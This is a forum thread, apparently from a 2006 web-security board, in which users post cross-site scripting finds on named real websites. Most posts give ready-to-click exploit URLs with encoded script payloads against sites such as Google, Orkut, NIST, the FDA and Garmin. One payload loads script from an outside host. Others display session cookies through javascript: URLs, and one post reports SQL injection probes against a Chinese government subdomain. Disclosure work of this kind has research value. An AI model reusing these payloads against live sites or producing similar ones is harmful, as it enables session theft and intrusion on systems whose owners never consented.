Wow, this time they fixed it in 20 minutes!

– mesca
« Reality is merely an illusion, albeit a very persistent one. » – Albert Einstein

heh, well all he had to do to fix it was add the letter 'g' inside the .replace() .. so that's no surprise. Good job on following up on the fix to test out it's new filter.

Sadly though, most all of these XSS holes are one-line fixes, or even a couple lines - yet go unpatched/ignored for months

-maluc

This just says it all...and yes, this is a valid site.

http://omfg.com/quickResults.asp?searchtype=D&radiobutton=radiobutton&searchfield=%3Cscript%3Ealert%28%22omfg+I+cant+believe+this+site+is+real%22%29%3C%2Fscript%3E&x=0&y=0

A few more...

[www.mapquest.com]
[vonage.com]
[www.hackaday.com]
[www.computerworld.com]
[www.blogdigger.com]
[www.dlink.com]
[search.ati.com]
[www.oracle.com]
[www.netscape.com]
[www.blackberry.com]

wow godspeed, you certainly live up to your nick of the speed of god at posting. And welcome to the forums.

on a side note, you might want to use the search function here to check if any have been previously disclosed.. as several of those have. Could save from duplicate efforts. But good work none the less..

-maluc

maluc-

Thanks and sorry about the dupes, I suspected some of them had probably been discovered - I'll try do a search in the future before posting more. Is there a single summary post somewhere that has all of them combined into a single list?

If anyone is looking for some more to chew on, take a look at these. I haven't got fully functional links yet but they appear to be vulnerable to XSS as well.

www.chron.com - search field on top
imdb.com/search - character name search
geeksquad.com - sign up link on bottom left

http://search.chron.com/chronicle/search.do;jsessionid=a8wANAmcLZCf5skcO7?basicSearchFormComponent.resultsPerPage=10&basicSearchFormComponent.pageNum=1&basicSearchFormComponent.maxResults=1000&basicSearchFormComponent.mode=search&basicSearchFormComponent.booleanMode=false&basicSearchFormComponent.propertyGroup=CHRONICLE&basicSearchFormComponent.configName=basic&basicSearchFormComponent.siteName=Chronicle&basicSearchFormComponent.contextMode=false&basicSearchFormComponent.shadowSearchText=asdf%27e%22e%3Ee%3Ce&resultNavigationFormComponent.propertyGroup=CHRONICLE&resultNavigationFormComponent.configName=taxonomy&resultNavigationFormComponent.limitResults=0&iqlRulesFormComponent.configName=iql&iqlRulesFormComponent.processManualRules=true&iqlRulesFormComponent.processSponsoredRules=true&iqlRulesFormComponent.processConcepts=true&archiveSearchFormComponent.selectedInterval=7&archiveSearchFormComponent.selectedFromYear=2006&archiveSearchFormComponent.selectedToYear=2006&selectedSort=Date&basicSearchFormComponent.searchText=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&basicSearchFormComponent.selectedDatabaseNames=Everything
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://imdb.com/Character&char=asdf%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&gender=male&GO.x=10&GO.y=9&GO=search imdb.com
http://sla.ckers.org/forum/read.php?3,44,1186#msg-1186 geeksquad.. although disclosed by Ghozt the day before

and no, their isn't a summary currently :/ .. parsing the pages into a single list is on my To Do list.. but it's been there quite a while :x

-maluc

A few more, ran a search and didn't see them yet.

[www.philipmorrisusa.com]
[www.realtor.com]
[wwwa.accuweather.com]
[reports.internic.net]
[www.wirelessweek.com]
[www.anadarko.com]

maluc-

More if you want to fix up:

http://smallbusiness.dnb.com/advance-search.asp?

Business Name: Test
City: <Insert XSS>
State: Alabama

https://www.chevron.apply2jobs.com/

Keywords: <Insert XSS>

as disclosed by godspeedsc5:

http://smallbusiness.dnb.com/search-results.asp?name=test&city=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&state=AL&country=US

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.chevron.apply2jobs.com/index.cfm?fuseaction=mExternal.searchJobs&txtKeyword=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E chevron.apply2jobs.com

-maluc

maluc Wrote:
-------------------------------------------------------
> http://sla.ckers.org/forum/read.php?3,44,1186#msg-
> 1186 geeksquad.. although disclosed by Ghozt the
> day before
>
> and no, their isn't a summary currently :/ ..
> parsing the pages into a single list is on my To
> Do list.. but it's been there quite a while :x
>
> -maluc


Yarr, genius!
Just stopping in to say hi, I've been really busy lately so I just check the forums and blog once in a while.

http://www.roommateclick.com/error.asp?UID=&Room=0&msg=%3Cscript%3Ealert('ASL?');%3C/script%3E

- Kyran

I always begin on the last page in Google, working my way back. :]

A few more...

[www.dexonline.com]
[pd.startribune.com]
[movies.excite.com]
[www.netgear.com]
[www.congress.org]
[www.pizzahut.com]
[www.bizrate.com]
[www.best-price.com]
[www.bankrate.com]
[www.feedster.com]

A few more...

[www.sxc.hu]
[www.hotels.com]
[www.tucows.com]
[newmeds.phrma.org]
[search.nortel.com]

maluc-

Take a look at these...

http://support.microtek.com/online_support.phtml
Search (Insert XSS)

http://www.accessdata.fda.gov/scripts/cdrh/cfdocs/cfMAUDE/search.cfm?searchoptions=1
Brand Name (Insert XSS)

http://www.cas.org/Support/DDS/ddssearch.html?
Find (Insert XSS)

as disclosed by godspeed, but click-friendly:
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.microtekusa.com/cgi-bin/search.cgi&boolean=AND&case=Insensitive&terms=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.accessdata.fda.gov/scripts/cdrh/cfdocs/cfMAUDE/Results.cfm?SearchString=&SearchYear=&ProductProblem=&DeviceName=&BrandName=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&Manufacturer=&EventType=&KNumber=K&PMANumber=P&ProductCode=&ReportDateFrom=01%2F01%2F2006&ReportDateTo=09%2F29%2F2006&PAGENUM=10&submit=Search
http://www.cas.org/cgi-bin/ddssearch.pl?string=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

-maluc

A few more...

[www.officemax.com]
[www.flightsearch.com]
[www.evite.com]
[www.hallmark.com]
[www.dscc.dla.mil]

Disclosed from noctural:

[search.mit.edu]
[images.jsc.nasa.gov]

http://shop.garmin.com/orderstatus.jsp?order_number=%3Cscript%20src=//ckers.org/s?

Eesh, this one was a pain in the ass to get fit into the proper space required. This is about as short as I could possibly get it other than getting a shorter domain, or changing the base page on a domain to a piece of JavaScript.

- RSnake
Gotta love it. http://ha.ckers.org

rsnake: for me it becomes this on firefox: <script src=//ckers.org/s</strong >

which is easy enough to add to apache as well

-maluc

http://www.nist.gov/nta-bin/query2.cgi?org-title=284%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

http://origins.firstgov.gov/external/external.jsp?url=javascript%3Aalert%28%22Your%20cookie%20is%3A%20%22%20+%20document.cookie%29 Click to continue.



Edited 1 time(s). Last edit at 11/16/2006 03:13AM by Ghozt.

A few more...

[americanart.si.edu]
[www.searchsystems.net]
[heraldtribune.com]
[www.sciencemag.org]
[www.theatlantic.com]

Need clicks friendlies...

http://thomas.loc.gov/
Search <Insert XSS>

http://rogerebert.suntimes.com/apps/pbcs.dll/frontpage
Search Reviews <Insert XSS>

happy to oblige:
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://thomas.loc.gov/cgi-bin/thomas&database=text&query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E thomas.loc.gov
http://rogerebert.suntimes.com/apps/pbcs.dll/classifieds?category=search3&q=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx

-maluc

Oops, I typoed that one, maluc, but you're right that would have worked too, to change the file on the server to match whatever was coming down stream in the case where you are limited on space: http://shop.garmin.com/orderstatus.jsp?order_number=%3Cscript%20src=//ckers.org/s%3F

- RSnake
Gotta love it. http://ha.ckers.org

http://blog.chinainfo.gov.cn/blog/index.jsp?UserID=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E


Ever wonder if the Chinese government supported hacking?
http://bjcert.bnii.gov.cn/2j/mj/mj.jsp?unid=20385 Hacking with Google
http://bjcert.beijingit.gov.cn/2j/zxyj/mj.jsp?unid=27007 Limbo CMS?

[edit] While I was going through a few more sites I found an SQL inject on a subdomain off of chinainfo.gov.cn. I played around with it for a bit but couldn't get my injected commands to work, just got plenty of SQL errors. Only thing that happened close to executing was the page wouldn't load after I tried an integer select inject. ie. 777 OR 1=1
[edit 2] Actually we're upto 2 SQL injects :X
http://active.chinainfo.gov.cn/sars/ViewInfoText.jsp?infoid=%27
http://active.chinainfo.gov.cn/ChinaInfo/EBuy/shop_detail.jsp?id=1%20OR%201=1



Edited 3 time(s). Last edit at 11/16/2006 04:03PM by unsticky.

Ugh... I don't like the idea of any state sponsored hacking activities. Information warfare is not good.

- RSnake
Gotta love it. http://ha.ckers.org

Google
You need to click "I forgot my password."
http://www.google.com/support/accounts/bin/answer.py?answer=48598&fpUrl=javascript%3Aalert%28document.cookie%29

Google #2
Just click the link: http://www.google.com/support/accounts/bin/search.py?query=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&ctx=en%3Asearchbox (I'm sure someone could make it work better if they wanted.)

Orkut
The same as Google #2 but it's orkut.
http://help.orkut.com/bin/search.py?ctx=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&query=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D



Edited 2 time(s). Last edit at 11/16/2006 08:32PM by Ghozt.

The first Google one works, but the second one doesn't in either FF or IE.

The first one is interesting, I'm curious as to how you discovered it.

Wow, surely they didn't fix it THAT fast.
Greasemonkey XSS Assistant+XSS Locator via http://www.google.com/support/accounts/bin/search.py?query=&ctx=en%3Asearchbox
I can't recreate it now, it's awesome if they fixed it that fast, but I don't think they did. It poped up an alert saying "X?" instead of "XSS", that's why I said someone could probably make it work better.

I just messed with fpUrl (forgotpasswordUrl) for a second until I figured out what it did.

I can't redo it with or without the XSS assistant, it's hard to believe that they fixed it that fast, but if they did then good job Google.



Edited 1 time(s). Last edit at 11/16/2006 09:03PM by Ghozt.

i believe the first link has been previously disclosed in this thread.. somewhere. but as a base64 string (data:text/html;base64;etc.)

and speaking of google, there's another one i'll post in a couple hours (not actually on google, it's just their external search API)

but making this encoding routine is quite a pain - javascript is terrible for debugging :/

-maluc